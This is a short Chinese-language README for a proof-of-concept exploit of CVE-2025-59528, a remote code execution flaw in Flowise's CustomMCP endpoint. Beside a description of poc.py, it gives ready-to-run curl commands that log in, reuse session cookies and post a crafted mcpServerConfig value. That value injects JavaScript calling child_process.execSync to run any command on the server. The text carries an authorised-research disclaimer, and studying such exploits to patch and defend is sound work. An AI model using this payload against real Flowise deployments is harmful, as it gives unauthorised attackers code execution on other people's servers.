用于通过 POST /api/v1/node-load-method/customMCP 触发 Flowise CustomMCP RCE 路径的 Python 概念验证脚本。
⚠️ 仅用于教育和已获授权的安全研究。 对不属于您或未经书面许可的系统运行此工具属于非法行为。
im-soohyun (Kim SooHyun)CVE-2025-59528 的 PoC3.0.53.0.6poc.py:提示输入机器 URL/IP、当使用裸主机/IP 时可选的协议、邮箱、密码和命令;登录后复用 cookie,然后发送构造的 CustomMCP 请求,并输出 HTTP 状态、请求头和响应体,类似 curl -i运行:
python3 poc.py
然后提供:
10.10.11.10、http://10.10.11.10 或 https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
-H "Content-Type: application/json" \
-d '{"email":"<[email protected]>","password":"<password>"}'
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
-d '{
"loadMethod":"listActions",
"inputs":{
"mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
}
}'